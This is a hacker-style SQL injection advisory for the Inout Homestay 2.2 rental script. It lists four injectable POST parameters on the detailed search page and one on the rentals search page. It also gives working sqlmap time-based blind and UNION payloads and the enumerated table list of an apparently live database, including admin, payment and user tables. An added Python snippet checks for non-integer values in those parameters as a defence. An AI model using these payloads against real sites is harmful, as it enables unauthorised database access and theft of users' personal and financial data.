┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : inoutscripts.com                                                           │
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │
│  Software : Inout Homestay 2.2                                                         │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data and modification │
│ of data, and can crash the application or make it unavailable, leading to lost revenue │
│ and damage to a company's reputation.                                                  │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=search/searchdetailed

broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis

POST parameter 'broom' is vulnerable to SQLI
POST parameter 'bathr' is vulnerable to SQLI
POST parameter 'beds' is vulnerable to SQLI
POST parameter 'numguest' is vulnerable to SQLI


Path: /index.php?page=search/rentals

location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana

POST parameter 'guests' is vulnerable to SQLI

---
Parameter: broom (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_homestay'
Database: *****_homestay

[52 tables]
+----------------------------------+
| admin_account                    |
| admin_payment_details            |
| category_property                |
| chat_details                     |
| chat_messages                    |
| checkout_ipn                     |
| countries                        |
| coupon_detail                    |
| cron_details                     |
| custom_field                     |
| demo_message                     |
| email_details                    |
| email_templates                  |
| forgetpassword                   |
| host_rejected                    |
| inout_ipns                       |
| languages                        |
| list_date_request                |
| list_images                      |
| listing_date                     |
| listing_detail                   |
| listing_main                     |
| message_notify_app               |
| messages                         |
| msg_req_temp                     |
| ppc_currency                     |
| public_side_media_detail         |
| public_slide_images              |
| refund_creditupdate              |
| request_coupon_detail            |
| settings                         |
| superhost_detail                 |
| traveller_bank_deposit_history   |
| traveller_cancellation_modes     |
| traveller_cancelled              |
| user_account_detail              |
| user_address_verify_request      |
| user_details                     |
| user_email_verification          |
| user_listing_request             |
| user_refunddetails               |
| user_registration                |
| user_reviews                     |
| user_search_details              |
| user_settings                    |
| user_wishlist_mapping            |
| user_withdrawal_details          |
| userabusereport                  |
| userbank_pending_listing_request |
| usercancellationsaction          |
| wish_list                        |
| withdrawal_request               |
+----------------------------------+

[-] Done
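
A defender-side check for the parameters reported above, as an added example that is not part of the original advisory or the vendor's code: it parses a POST body for the two listed paths and flags any reported parameter whose value is not a plain integer. The function name, the sample bodies and the assumption that these fields are small non-negative counts are illustrative.

```python
# Added example (not from the advisory): flag non-integer values in the
# POST parameters the advisory reports as injectable.
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint ("page" query value) -> parameters reported vulnerable on the page.
REPORTED = {
    "search/searchdetailed": ("broom", "bathr", "beds", "numguest"),
    "search/rentals": ("guests",),
}

# Assumption: these fields are small non-negative counts (rooms, beds, guests).
STRICT_INT = re.compile(r"[0-9]{1,4}")


def suspicious_params(url, body):
    """Return (name, value) pairs for reported parameters that are not plain integers."""
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    watched = REPORTED.get(query.get("page", ""), ())
    hits = []
    # parse_qsl decodes %XX and '+', and keeps duplicate keys
    # (the search form sends type=2 twice), so every occurrence is checked.
    for name, value in parse_qsl(body, keep_blank_values=True):
        value = value.strip()
        # An empty field is treated as "not supplied", not as an anomaly.
        if name in watched and value and not STRICT_INT.fullmatch(value):
            hits.append((name, value))
    return hits


# Constructed samples: a benign search body, and a body carrying the
# time-based test string shown in the advisory's sqlmap output.
BENIGN = ("location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&guests=2"
          "&searchcity=Indianapolis&searchstate=Indiana")
TAMPERED = ("broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)"
            "&bathr=1&beds=1&numguest=2&type=2&type=2")

if __name__ == "__main__":
    print(suspicious_params("/index.php?page=search/rentals", BENIGN))
    print(suspicious_params("/index.php?page=search/searchdetailed", TAMPERED))
```

This is a detection or input-gate check only; the fix is for the application to cast these fields to integers or bind them as query parameters before they reach MySQL.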